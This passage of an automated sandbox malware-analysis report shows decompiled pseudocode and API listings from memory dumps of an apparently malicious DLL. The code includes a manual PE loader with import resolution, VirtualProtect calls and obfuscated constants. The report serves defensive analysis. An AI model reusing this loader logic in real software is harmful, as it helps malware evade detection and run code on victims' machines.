                                					L1:
                                					_t60 = _v12;
                                					if(_t60 != 0) {
                                						goto L12;
                                					}
                                					asm("bt [esi+0x24], eax");
                                					if(_t60 >= 0) {
                                						asm("bt [esi+0x24], eax");
                                						if(__eflags >= 0) {
                                							L8:
                                							_t54 = _t57 - 0x63699bbf;
                                							L9:
                                							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                							if(_t43 == 0) {
                                								_v12 = GetLastError();
                                							}
                                							_v8 = _v8 + 1;
                                							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                                							if(_v8 < _v16) {
                                								continue;
                                							} else {
                                								goto L12;
                                							}
                                						}
                                						asm("bt [esi+0x24], eax");
                                						_t54 = _t57 - 0x63699bc1;
                                						if(__eflags >= 0) {
                                							goto L9;
                                						}
                                						goto L8;
                                					}
                                					asm("bt [esi+0x24], eax");
                                					if(_t60 >= 0) {
                                						_t54 = _t57 - 0x63699ba3;
                                					} else {
                                						_t54 = _t57 - 0x63699b83;
                                					}
                                					goto L9;
                                				}
                                				goto L12;
                                			}













                                APIs
                                • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6DD412A6
                                • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6DD4131B
                                • GetLastError.KERNEL32 ref: 6DD41321
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: ProtectVirtual$ErrorLast
                                • String ID:
                                • API String ID: 1469625949-0
                                • Opcode ID: 84b3003e9b9ec21820b3dd17c766e10b15e4f69cf2adbd6a5356f4499051ccb1
                                • Instruction ID: 6c7f8dc76a3a8107bda9893b5a4c9c2aa34c55b03eab71174f8345d0cb457a6e
                                • Opcode Fuzzy Hash: 84b3003e9b9ec21820b3dd17c766e10b15e4f69cf2adbd6a5356f4499051ccb1
                                • Instruction Fuzzy Hash: 8A21837180160BDFCB14EF99C495EAAF7F9FF08319F008959E016D7585E3B8A6A4CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 80%
                                			E6DD414E8() {
                                				char _v28;
                                				void _v44;
                                				char _v48;
                                				void* _v52;
                                				long _t23;
                                				int _t24;
                                				void* _t28;
                                				intOrPtr* _t30;
                                				signed int _t34;
                                				intOrPtr _t36;
                                
                                				_push(0);
                                				_push(0x6dd441c4);
                                				_push(1);
                                				_push( *0x6dd441d0 + 0x6dd45089);
                                				 *0x6dd441c0 = 0xc;
                                				 *0x6dd441c8 = 0; // executed
                                				L6DD41DA8(); // executed
                                				_t34 = 6;
                                				memset( &_v44, 0, _t34 << 2);
                                				if(E6DD41697( &_v44,  &_v28,  *0x6dd441cc ^ 0xfd7cd1cf) == 0) {
                                					_t23 = 0xb;
                                					L7:
                                					ExitThread(_t23);
                                				}
                                				_t24 = lstrlenW( *0x6dd441b8);
                                				_t7 = _t24 + 2; // 0x2
                                				_t10 = _t24 + _t7 + 8; // 0xa
                                				_t28 = E6DD41144(_t36, _t10,  &_v48,  &_v52); // executed
                                				if(_t28 == 0) {
                                					_t30 = _v52;
                                					 *_t30 = 0;
                                					if( *0x6dd441b8 == 0) {
                                						 *((short*)(_t30 + 4)) = 0;
                                					} else {
                                						E6DD42118(_t40, _t30 + 4);
                                					}
                                				}
                                				_t23 = E6DD41444(_v44); // executed
                                				goto L7;
                                			}














                                APIs
                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6DD441C4,00000000), ref: 6DD41519
                                • lstrlenW.KERNEL32(?,?,?), ref: 6DD4154D
                                  • Part of subcall function 6DD41144: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A,?,?), ref: 6DD41151
                                  • Part of subcall function 6DD41144: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6DD41167
                                  • Part of subcall function 6DD41144: _snwprintf.NTDLL ref: 6DD4118C
                                  • Part of subcall function 6DD41144: CreateFileMappingW.KERNELBASE(000000FF,6DD441C0,00000004,00000000,?,?), ref: 6DD411B1
                                  • Part of subcall function 6DD41144: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A,?), ref: 6DD411C8
                                  • Part of subcall function 6DD41144: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A), ref: 6DD411FD
                                • ExitThread.KERNEL32 ref: 6DD4159C
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                                • String ID:
                                • API String ID: 4209869662-0
                                • Opcode ID: 50ce143ccd851a73fbac6c3b3d0cf522b6d5f21c12d461aced705e1eabeef9ef
                                • Instruction ID: ac028e655801ec36a03b35da7946a0b8682c7e765c4e225920c6606807288298
                                • Opcode Fuzzy Hash: 50ce143ccd851a73fbac6c3b3d0cf522b6d5f21c12d461aced705e1eabeef9ef
                                • Instruction Fuzzy Hash: B6119D72558205AFEB11FF64C844FAB7BFCBB49708F018A16F259D7140DB70E5948BA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 84%
                                			E6DD41ADB(void* __ecx) {
                                				void* _v8;
                                				char _v12;
                                				signed short _t15;
                                				char* _t18;
                                				char* _t25;
                                				char* _t29;
                                
                                				_t22 = __ecx;
                                				_push(__ecx);
                                				_push(__ecx);
                                				_t25 = 0;
                                				if(E6DD41697( &_v8,  &_v12,  *0x6dd441cc ^ 0x196db149) != 0) {
                                					if(_v8 == 0) {
                                						_t29 = 0;
                                					} else {
                                						_t29 = E6DD42087(_t22, _v8,  *0x6dd441cc ^ 0x6e49bbff);
                                					}
                                					if(_t29 != 0) {
                                						_t15 = E6DD41E8A(_t22); // executed
                                						_v12 = _t15 & 0x0000ffff;
                                						_t18 = StrStrIA(_t29,  &_v12); // executed
                                						if(_t18 != 0) {
                                							_t25 = 0x657;
                                						}
                                					}
                                					HeapFree( *0x6dd44190, 0, _v8);
                                				}
                                				return _t25;
                                			}










                                APIs
                                • StrStrIA.KERNELBASE(00000000,6DD41CE6,?,6DD41CE6,?,00000000,00000000,?,?,?,6DD41CE6), ref: 6DD41B32
                                • HeapFree.KERNEL32(00000000,?,?,6DD41CE6,?,00000000,00000000,?,?,?,6DD41CE6), ref: 6DD41B4C
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 74a8af9c2875d4d000de1a0f8862a56ce0617ff5c74a7692eb2f4063eeacfd44
                                • Instruction ID: b3746777ec6cb7f25307bb648129e8c6b3348bd835dc042929bff2c60389032b
                                • Opcode Fuzzy Hash: 74a8af9c2875d4d000de1a0f8862a56ce0617ff5c74a7692eb2f4063eeacfd44
                                • Instruction Fuzzy Hash: 5D014476A10115EBDB01BFA5CD00FAF7BBDEB4A644F118161FA40E3144EB31EA519AB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetTempPathA.KERNELBASE(000008DA,?), ref: 6DD8C6F8
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: PathTemp
                                • String ID:
                                • API String ID: 2920410445-0
                                • Opcode ID: 621ed5509de4f391c6921c8e15da5235dc3955509ea46d62b37a9bd78f99e8c6
                                • Instruction ID: f4e07afb476ba073acddb2ce3b3eda7317a7ac56ce0e0d98b3741bd47d5083d0
                                • Opcode Fuzzy Hash: 621ed5509de4f391c6921c8e15da5235dc3955509ea46d62b37a9bd78f99e8c6
                                • Instruction Fuzzy Hash: E9D19FB2905116CFEB05EF7DC8807AD7BB9FB8A310F164229E415A73C6EB349805CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL(00000008,6DDCB004,00000000), ref: 6DDAD7D3
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: e348db4839fbcfc914ad249992d3f4943cce7d9fe7ff42414fec8cfa0e52da66
                                • Instruction ID: 0dfaf6b211baca78174b89e6ca9e0231bec886102d52e81e93fde61204dcccf7
                                • Opcode Fuzzy Hash: e348db4839fbcfc914ad249992d3f4943cce7d9fe7ff42414fec8cfa0e52da66
                                • Instruction Fuzzy Hash: DCF0BB32544525ABEB197B25CC04F5B7758AFC2760F09C011FD5696584EB30D90246F0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6DDB0133
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 66b8d34aa9532709a0f17f37a1c934dad9a4b8f540400b31e4b453cf88a3b034
                                • Instruction ID: 2650352de37d323626d197133a38fa154d8bd3ccc36156875fcedc5159912f6b
                                • Opcode Fuzzy Hash: 66b8d34aa9532709a0f17f37a1c934dad9a4b8f540400b31e4b453cf88a3b034
                                • Instruction Fuzzy Hash: 0FE0A061549612A7E7193B6A8D00FBB765CAF437E8F015050FD5AD6089EB70D80085B4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 86%
                                			E6DD41444(void* __eax) {
                                				char _v8;
                                				void* _v12;
                                				void* __edi;
                                				void* _t18;
                                				long _t24;
                                				long _t26;
                                				long _t29;
                                				intOrPtr _t40;
                                				void* _t41;
                                				intOrPtr* _t42;
                                				void* _t44;
                                
                                				_t41 = __eax;
                                				_t16 =  *0x6dd441cc;
                                				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6dd441cc - 0x63698bc4 &  !( *0x6dd441cc - 0x63698bc4);
                                				_t18 = E6DD41060( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6dd441cc - 0x63698bc4 &  !( *0x6dd441cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6dd441cc - 0x63698bc4 &  !( *0x6dd441cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                                				if(_t18 != 0) {
                                					_t29 = 8;
                                					goto L8;
                                				} else {
                                					_t40 = _v8;
                                					_t29 = E6DD41A5A(_t33, _t40, _t41);
                                					if(_t29 == 0) {
                                						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                						_t24 = E6DD41F7C(_t40, _t44); // executed
                                						_t29 = _t24;
                                						if(_t29 == 0) {
                                							_t26 = E6DD4126D(_t44, _t40); // executed
                                							_t29 = _t26;
                                							if(_t29 == 0) {
                                								_push(_t26);
                                								_push(1);
                                								_push(_t40);
                                								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                									_t29 = GetLastError();
                                								}
                                							}
                                						}
                                					}
                                					_t42 = _v12;
                                					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                					E6DD4142F(_t42);
                                					L8:
                                					return _t29;
                                				}
                                			}















                                APIs
                                  • Part of subcall function 6DD41060: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6DD41480,?,?,?,?,00000002,00000000,?,?), ref: 6DD41084
                                  • Part of subcall function 6DD41060: GetProcAddress.KERNEL32(00000000,?), ref: 6DD410A6
                                  • Part of subcall function 6DD41060: GetProcAddress.KERNEL32(00000000,?), ref: 6DD410BC
                                  • Part of subcall function 6DD41060: GetProcAddress.KERNEL32(00000000,?), ref: 6DD410D2
                                  • Part of subcall function 6DD41060: GetProcAddress.KERNEL32(00000000,?), ref: 6DD410E8
                                  • Part of subcall function 6DD41060: GetProcAddress.KERNEL32(00000000,?), ref: 6DD410FE
                                  • Part of subcall function 6DD41A5A: memcpy.NTDLL(00000000,00000002,6DD4148E,?,?,?,?,?,6DD4148E,?,?,?,?,?,?,00000002), ref: 6DD41A87
                                  • Part of subcall function 6DD41A5A: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6DD41ABA
                                  • Part of subcall function 6DD41F7C: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6DD41FB4
                                  • Part of subcall function 6DD4126D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6DD412A6
                                  • Part of subcall function 6DD4126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6DD4131B
                                  • Part of subcall function 6DD4126D: GetLastError.KERNEL32 ref: 6DD41321
                                • GetLastError.KERNEL32(?,?), ref: 6DD414C2
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                • String ID:
                                • API String ID: 2673762927-0
                                • Opcode ID: d2622eb23e1f98813127c703ba14ad404fb7f8ef932f30228e141f9320f3d06e
                                • Instruction ID: 74b1e8fc2fa3a6ee746706bb5c280f9533c1dfa8bf37a4b0ea2fe9f0083955bb
                                • Opcode Fuzzy Hash: d2622eb23e1f98813127c703ba14ad404fb7f8ef932f30228e141f9320f3d06e
                                • Instruction Fuzzy Hash: 7A112B76704716ABD721BBE98C80DAB77BCBF48204B05C158FA4997145FBA0ED1687B0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name::operator+$operator+
                                • String ID: /
                                • API String ID: 1595903985-2043925204
                                • Opcode ID: 183bdda7f236a32f80742143e39b796ce77210b687659eef335bb3ec3d7c3dcc
                                • Instruction ID: 9a6fec81cee74751c58b1d6e96051cb6ffb0c4ac5742bf0b46efbb434a80c78a
                                • Opcode Fuzzy Hash: 183bdda7f236a32f80742143e39b796ce77210b687659eef335bb3ec3d7c3dcc
                                • Instruction Fuzzy Hash: E6825376D1420ADBDF15EFE8C890BEEB7B9BB08354F11812AF515EB280DB359944CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E6DD41F10() {
                                				void* _t1;
                                				long _t3;
                                				void* _t4;
                                				long _t5;
                                				void* _t6;
                                				intOrPtr _t8;
                                
                                				_t8 =  *0x6dd441b0;
                                				_t1 = CreateEventA(0, 1, 0, 0);
                                				 *0x6dd441bc = _t1;
                                				if(_t1 == 0) {
                                					return GetLastError();
                                				}
                                				_t3 = GetVersion();
                                				if(_t3 <= 5) {
                                					_t4 = 0x32;
                                					return _t4;
                                				} else {
                                					 *0x6dd441ac = _t3;
                                					_t5 = GetCurrentProcessId();
                                					 *0x6dd441a8 = _t5;
                                					 *0x6dd441b0 = _t8;
                                					_t6 = OpenProcess(0x10047a, 0, _t5);
                                					 *0x6dd441a4 = _t6;
                                					if(_t6 == 0) {
                                						 *0x6dd441a4 =  *0x6dd441a4 | 0xffffffff;
                                					}
                                					return 0;
                                				}
                                			}










                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6DD41C8E,751463F0,00000000), ref: 6DD41F1F
                                • GetVersion.KERNEL32 ref: 6DD41F2E
                                • GetCurrentProcessId.KERNEL32 ref: 6DD41F3D
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6DD41F56
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: Process$CreateCurrentEventOpenVersion
                                • String ID:
                                • API String ID: 845504543-0
                                • Opcode ID: ad1d5ca1a80d96a25d720f32b78de4f20eeaecd53cc2ca4603b5bec1a52f17ca
                                • Instruction ID: 24b5ba26f16927f20996547cc0d5b33b28afa0104ff3f2833c8f4c2adfda86d6
                                • Opcode Fuzzy Hash: ad1d5ca1a80d96a25d720f32b78de4f20eeaecd53cc2ca4603b5bec1a52f17ca
                                • Instruction Fuzzy Hash: 10F017716C5250AFFF50BF68A8097953BB4BB1A751F14421AF265D91C0E7B084C28B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6DD44D40), ref: 6DDB1CE8
                                • _free.LIBCMT ref: 6DDB1CD6
                                  • Part of subcall function 6DDAD7F5: HeapFree.KERNEL32(00000000,00000000,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?), ref: 6DDAD80B
                                  • Part of subcall function 6DDAD7F5: GetLastError.KERNEL32(?,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?,?), ref: 6DDAD81D
                                • _free.LIBCMT ref: 6DDB1EA2
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 2155170405-0
                                • Opcode ID: 5d7e4b68ba5055ace9a3d21ec148c9cf8bf9b04432795710c2f1071d6cdb4346
                                • Instruction ID: b103db824af9df898bc59f4516b0de3561c67b078256806c36cae7a3ada78dae
                                • Opcode Fuzzy Hash: 5d7e4b68ba5055ace9a3d21ec148c9cf8bf9b04432795710c2f1071d6cdb4346
                                • Instruction Fuzzy Hash: 9351C9B1D4421AEBDB10FF78CC40AAA77BCAF86358F11426AF561D7181EB309945CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,7FFFFFFF), ref: 6DDA19E7
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,7FFFFFFF), ref: 6DDA19F1
                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,7FFFFFFF), ref: 6DDA19FE
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: 1f8af9bd562610fa9673ac9cdbf48bc52795fbf7fc30ca9f9a42a4aff91494d5
                                • Instruction ID: 1d24ced798f60500cb6e689d1e6959de1a9fcf5a3ccb6fecb32a711dc06181ee
                                • Opcode Fuzzy Hash: 1f8af9bd562610fa9673ac9cdbf48bc52795fbf7fc30ca9f9a42a4aff91494d5
                                • Instruction Fuzzy Hash: 7F31D47590122DABCB21EF24D9887DDBBB8BF48310F5081EAE51CA7291E7709B858F54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcess.KERNEL32(?,?,6DDA211F,?,?,?,?), ref: 6DDA2142
                                • TerminateProcess.KERNEL32(00000000,?,6DDA211F,?,?,?,?), ref: 6DDA2149
                                • ExitProcess.KERNEL32 ref: 6DDA215B
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: 8df1c309dac1676440e095896d54675fe1b9854f6b8b916f61253f1eeaf65002
                                • Instruction ID: 16dc536badb60be96c1900e372e614916bc2c8bd9ff3716bddf579e5d9507d46
                                • Opcode Fuzzy Hash: 8df1c309dac1676440e095896d54675fe1b9854f6b8b916f61253f1eeaf65002
                                • Instruction Fuzzy Hash: 3DE0EC71108188EFCF357F66CD48A6E3FB9EB52649B054414FB498623ACB35ED82CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: b8dc42268dfedf98d12094be3bf27d9cf0ca32c3e870895538069a9728e22642
                                • Instruction ID: a205ca2d41949613d490011b70c46d618cce2a20facda820c32ab4656900a0f9
                                • Opcode Fuzzy Hash: b8dc42268dfedf98d12094be3bf27d9cf0ca32c3e870895538069a9728e22642
                                • Instruction Fuzzy Hash: 7C720574E0020ADFCB14DFA9C990ABEB7B5EF44348F19856DED4597349D732AA02CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0fdf9d6de8286cd2b1aec4dbdbf1c33c30447d3a0964aa105c041d8c19639164
                                • Instruction ID: b30d5385ea3ae64b036aaad3d38ba4bd831cc401ce30eea576912d618730ce7b
                                • Opcode Fuzzy Hash: 0fdf9d6de8286cd2b1aec4dbdbf1c33c30447d3a0964aa105c041d8c19639164
                                • Instruction Fuzzy Hash: 57F17071E01219DFDF14DFA8C8906ADF7B5FF88324F258269E919AB345D731AA01CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6DDC62BB,?,?,00000008,?,?,6DDC5E3E,00000000), ref: 6DDC64ED
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: ExceptionRaise
                                • String ID:
                                • API String ID: 3997070919-0
                                • Opcode ID: 24d28e547ee5afccdca66c6dcd4a5e2ff363d8dfa1a2ab6dfaf45d338007e64d
                                • Instruction ID: c25248b44a208b70bdb8d9619e9af5360b2fb6187906e64f4bd088b696cfc919
                                • Opcode Fuzzy Hash: 24d28e547ee5afccdca66c6dcd4a5e2ff363d8dfa1a2ab6dfaf45d338007e64d
                                • Instruction Fuzzy Hash: 0AB13731224609CFD705DF28C486B797BA4FF45364F258658F8A9CF2A6C335E992CB81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E6DD42485(long _a4) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				short* _v32;
                                				void _v36;
                                				void* _t57;
                                				signed int _t58;
                                				signed int _t61;
                                				signed int _t62;
                                				void* _t63;
                                				signed int* _t68;
                                				intOrPtr* _t69;
                                				intOrPtr* _t71;
                                				intOrPtr _t72;
                                				intOrPtr _t75;
                                				void* _t76;
                                				signed int _t77;
                                				void* _t78;
                                				void _t80;
                                				signed int _t81;
                                				signed int _t84;
                                				signed int _t86;
                                				short* _t87;
                                				void* _t89;
                                				signed int* _t90;
                                				long _t91;
                                				signed int _t93;
                                				signed int _t94;
                                				signed int _t100;
                                				signed int _t102;
                                				void* _t104;
                                				long _t108;
                                				signed int _t110;
                                
                                				_t108 = _a4;
                                				_t76 =  *(_t108 + 8);
                                				if((_t76 & 0x00000003) != 0) {
                                					L3:
                                					return 0;
                                				}
                                				_a4 =  *[fs:0x4];
                                				_v8 =  *[fs:0x8];
                                				if(_t76 < _v8 || _t76 >= _a4) {
                                					_t102 =  *(_t108 + 0xc);
                                					__eflags = _t102 - 0xffffffff;
                                					if(_t102 != 0xffffffff) {
                                						_t91 = 0;
                                						__eflags = 0;
                                						_a4 = 0;
                                						_t57 = _t76;
                                						do {
                                							_t80 =  *_t57;
                                							__eflags = _t80 - 0xffffffff;
                                							if(_t80 == 0xffffffff) {
                                								goto L9;
                                							}
                                							__eflags = _t80 - _t91;
                                							if(_t80 >= _t91) {
                                								L20:
                                								_t63 = 0;
                                								L60:
                                								return _t63;
                                							}
                                							L9:
                                							__eflags =  *(_t57 + 4);
                                							if( *(_t57 + 4) != 0) {
                                								_t12 =  &_a4;
                                								 *_t12 = _a4 + 1;
                                								__eflags =  *_t12;
                                							}
                                							_t91 = _t91 + 1;
                                							_t57 = _t57 + 0xc;
                                							__eflags = _t91 - _t102;
                                						} while (_t91 <= _t102);
                                						__eflags = _a4;
                                						if(_a4 == 0) {
                                							L15:
                                							_t81 =  *0x6dd441f8;
                                							_t110 = _t76 & 0xfffff000;
                                							_t58 = 0;
                                							__eflags = _t81;
                                							if(_t81 <= 0) {
                                								L18:
                                								_t104 = _t102 | 0xffffffff;
                                								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                								__eflags = _t61;
                                								if(_t61 < 0) {
                                									_t62 = 0;
                                									__eflags = 0;
                                								} else {
                                									_t62 = _a4;
                                								}
                                								__eflags = _t62;
                                								if(_t62 == 0) {
                                									L59:
                                									_t63 = _t104;
                                									goto L60;
                                								} else {
                                									__eflags = _v12 - 0x1000000;
                                									if(_v12 != 0x1000000) {
                                										goto L59;
                                									}
                                									__eflags = _v16 & 0x000000cc;
                                									if((_v16 & 0x000000cc) == 0) {
                                										L46:
                                										_t63 = 1;
                                										 *0x6dd44240 = 1;
                                										__eflags =  *0x6dd44240;
                                										if( *0x6dd44240 != 0) {
                                											goto L60;
                                										}
                                										_t84 =  *0x6dd441f8;
                                										__eflags = _t84;
                                										_t93 = _t84;
                                										if(_t84 <= 0) {
                                											L51:
                                											__eflags = _t93;
                                											if(_t93 != 0) {
                                												L58:
                                												 *0x6dd44240 = 0;
                                												goto L5;
                                											}
                                											_t77 = 0xf;
                                											__eflags = _t84 - _t77;
                                											if(_t84 <= _t77) {
                                												_t77 = _t84;
                                											}
                                											_t94 = 0;
                                											__eflags = _t77;
                                											if(_t77 < 0) {
                                												L56:
                                												__eflags = _t84 - 0x10;
                                												if(_t84 < 0x10) {
                                													_t86 = _t84 + 1;
                                													__eflags = _t86;
                                													 *0x6dd441f8 = _t86;
                                												}
                                												goto L58;
                                											} else {
                                												do {
                                													_t68 = 0x6dd44200 + _t94 * 4;
                                													_t94 = _t94 + 1;
                                													__eflags = _t94 - _t77;
                                													 *_t68 = _t110;
                                													_t110 =  *_t68;
                                												} while (_t94 <= _t77);
                                												goto L56;
                                											}
                                										}
                                										_t69 = 0x6dd441fc + _t84 * 4;
                                										while(1) {
                                											__eflags =  *_t69 - _t110;
                                											if( *_t69 == _t110) {
                                												goto L51;
                                											}
                                											_t93 = _t93 - 1;
                                											_t69 = _t69 - 4;
                                											__eflags = _t93;
                                											if(_t93 > 0) {
                                												continue;
                                											}
                                											goto L51;
                                										}
                                										goto L51;
                                									}
                                									_t87 = _v32;
                                									__eflags =  *_t87 - 0x5a4d;
                                									if( *_t87 != 0x5a4d) {
                                										goto L59;
                                									}
                                									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                									__eflags =  *_t71 - 0x4550;
                                									if( *_t71 != 0x4550) {
                                										goto L59;
                                									}
                                									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                										goto L59;
                                									}
                                									_t78 = _t76 - _t87;
                                									__eflags =  *((short*)(_t71 + 6));
                                									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                									if( *((short*)(_t71 + 6)) <= 0) {
                                										goto L59;
                                									}
